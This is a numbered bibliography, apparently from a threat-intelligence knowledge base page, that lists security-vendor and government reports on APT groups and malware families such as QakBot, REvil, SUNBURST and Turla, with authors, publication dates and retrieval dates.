  63. Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.
  64. Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.
  65. Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.
  66. Kizhakkinan, D., et al. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018.
  67. Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018.
  68. Gorelik, M.. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019.
  69. Nicolas Verdier. (n.d.). Retrieved January 29, 2018.
  70. Mendoza, E. et al. (2020, May 25). Qakbot Resurges, Spreads through VBS Files. Retrieved September 27, 2021.
  71. CS. (2020, October 7). Duck Hunting with Falcon Complete: A Fowl Banking Trojan Evolves, Part 2. Retrieved September 27, 2021.
  72. Kuzmenko, A. et al. (2021, September 2). QakBot technical analysis. Retrieved September 27, 2021.
  73. Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.
  74. Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022.
  75. Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.
  76. Antiy CERT. (2020, April 20). Analysis of Ramsay components of Darkhotel's infiltration and isolation network. Retrieved March 24, 2021.
  77. Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.
  78. Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018.
  79. Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.
  80. Global Threat Center, Intelligence Team. (2020, December). APT27 Turns to Ransomware. Retrieved November 12, 2021.
  81. Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020.
  82. Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.
  83. FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.
  84. Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018.
  85. Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.
  86. Legezo, D. (2019, January 30). Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities. Retrieved April 17, 2019.
  87. Symantec Security Response. (2016, August 8). Backdoor.Remsec indicators of compromise. Retrieved August 17, 2016.
  88. Kaspersky Lab's Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Retrieved August 17, 2016.
  89. Kaspersky Lab's Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Technical Analysis. Retrieved August 17, 2016.
  90. Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020.
  91. Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.
  92. McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020.
  93. Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020.
  94. Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.
  95. Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.
  96. Moran, N., Oppenheim, M., Engle, S., & Wartell, R.. (2014, September 3). Darwin’s Favorite APT Group [Blog]. Retrieved November 12, 2014.
  97. Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020.
  98. Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.
  99. Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018.
  100. Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020.
  101. Jazi, Hossein. (2021, January 6). Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat. Retrieved March 22, 2022.
  102. Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020.
  103. Hasherezade. (2021, April 6). A deep dive into Saint Bot, a new downloader. Retrieved June 9, 2022.
  104. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016.
  105. Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020.
  106. Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016.
  107. Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.
  108. Kaspersky Lab. (2017, August). ShadowPad: popular server management software hit in supply chain attack. Retrieved March 22, 2021.
  109. Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.
  110. Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020.
  111. Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.
  112. Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021.
  113. Rewterz. (2020, April 20). Sidewinder APT Group Campaign Analysis. Retrieved January 29, 2021.
  114. Rewterz. (2020, June 22). Analysis on Sidewinder APT Group – COVID-19. Retrieved January 29, 2021.
  115. Unit42. (2016). SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE. Retrieved November 13, 2018.
  116. NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.
  117. Kervella, R. (2019, August 4). Cross-platform General Purpose Implant Framework Written in Golang. Retrieved July 30, 2021.
  118. BishopFox. (n.d.). Sliver. Retrieved September 15, 2021.
  119. DHS/CISA, Cyber National Mission Force. (2020, October 1). Malware Analysis Report (MAR) MAR-10303705-1.v1 – Remote Access Trojan: SLOTHFULMEDIA. Retrieved October 2, 2020.
  120. Hasherezade. (2016, September 12). Smoke Loader – downloader with a smokescreen still alive. Retrieved March 20, 2018.
  121. FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021.
  122. Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.
  123. CISA. (2020, July 16). MAR-10296782-1.v1 – SOREFANG. Retrieved September 29, 2020.
  124. National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.
  125. Falcone, R., et al. (2020, March 3). Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations. Retrieved December 14, 2020.
  126. Check Point Research. (2019, February 4). SpeakUp: A New Undetected Backdoor Linux Trojan. Retrieved April 17, 2019.
  127. Kumar, A., Stone-Gross, Brett. (2021, September 28). Squirrelwaffle: New Loader Delivering Cobalt Strike. Retrieved August 9, 2022.
  128. Tomcik, R. et al. (2022, February 24). Left On Read: Telegram Malware Spotted in Latest Iranian Cyber Espionage Activity. Retrieved August 18, 2022.
  129. Marczak, B. and Scott-Railton, J.. (2016, May 29). Keep Calm and (Don’t) Enable Macros: A New Threat Actor Targets UAE Dissidents. Retrieved June 8, 2016.
  130. Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020.
  131. Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
  132. Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22
  133. Mandiant Israel Research Team. (2022, August 17). Suspected Iranian Actor Targeting Israeli Shipping, Healthcare, Government and Energy Sectors. Retrieved September 21, 2022.
  134. FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.
  135. Riley, W. (2020, December 1). SUPERNOVA SolarWinds .NET Webshell Analysis. Retrieved February 18, 2021.
  136. Tennis, M. (2020, December 17). SUPERNOVA: A Novel .NET Webshell. Retrieved February 22, 2021.
  137. Schlapfer, Patrick. (2022, June 6). A New Loader Gets Ready. Retrieved December 13, 2022.
  138. Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.
  139. Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.
  140. Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020.
  141. Trend Micro. (2012). The Taidoor Campaign. Retrieved November 12, 2014.
  142. Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021.
  143. Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021.
  144. Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved August 4, 2022.
  145. Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.
  146. Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021.
  147. Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 22, 2021.
  148. Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018.
  149. Cisco Talos. (2021, September 21). TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines. Retrieved December 2, 2021.
  150. Kwiatkoswki, I. and Delcher, P. (2021, September 29). DarkHalo After SolarWinds: the Tomiris connection. Retrieved December 27, 2021.
  151. Beek, C. (2020, November 5). Operation North Star: Behind The Scenes. Retrieved December 20, 2021.
  152. CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.
  153. Salinas, M., Holguin, J. (2017, June). Evolution of Trickbot. Retrieved July 31, 2018.
  154. Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.
  155. Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020.
  156. Chen, J.. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.
  157. Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020.
  158. Tomonaga, S. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020.
  159. Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021
  160. ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.
  161. ESET Research. (2018, May 22). Turla Mosquito: A shift towards more generic tools. Retrieved July 3, 2018.
  162. Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.
  163. Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.
  164. FBI et al. (2023, May 9). Hunting Russian Intelligence “Snake” Malware. Retrieved June 8, 2023.
  165. Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019.
  166. Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved June 5, 2019.
  167. Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019.
  168. Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020.
  169. Zhou, R. (2012, May 15). Backdoor.Vasport. Retrieved February 22, 2018.
  170. GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.
  171. Lancaster, T., Cortes, J. (2018, January 29). VERMIN: Quasar RAT and Custom Malware Used In Ukraine. Retrieved July 5, 2018.
  172. PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.
  173. PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020.
  174. CISA. (2020, July 16). MAR-10296782-2.v1 – WELLMESS. Retrieved September 24, 2020.
  175. Falcone, R. et al.. (2022, January 20). Threat Brief: Ongoing Russia and Ukraine Cyber Conflict. Retrieved March 10, 2022.
  176. S2W. (2022, January 18). Analysis of Destructive Malware (WhisperGate) targeting Ukraine. Retrieved March 14, 2022.
  177. The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021.
  178. Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019.
  179. Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020.
  180. Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.
  181. S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019.
  182. John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.
  183. MalwareBytes Threat Intelligence Team. (2022, August 3). Woody RAT: A new feature-rich malware spotted in the wild. Retrieved December 6, 2022.
  184. Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.
  185. CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.
  186. Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.
  187. Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
  188. Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved November 26, 2018.
  189. ESET. (2018, November 20). Sednit: What’s going on with Zebrocy?. Retrieved February 12, 2019.
  190. Lee, B., Falcone, R. (2018, December 12). Dear Joohn: The Sofacy Group’s Global Campaign. Retrieved April 19, 2019.
  191. ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
  192. Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
  193. Axel F. (2017, April 27). APT Targets Financial Analysts with CVE-2017-0199. Retrieved February 15, 2018.
  194. Huss, D., et al. (2017, February 2). Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX. Retrieved April 5, 2018.
  195. Brumaghin, E., et al. (2017, November 02). Poisoning the Well: Banking Trojan Targets Google Search Results. Retrieved November 5, 2018.
  196. Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019.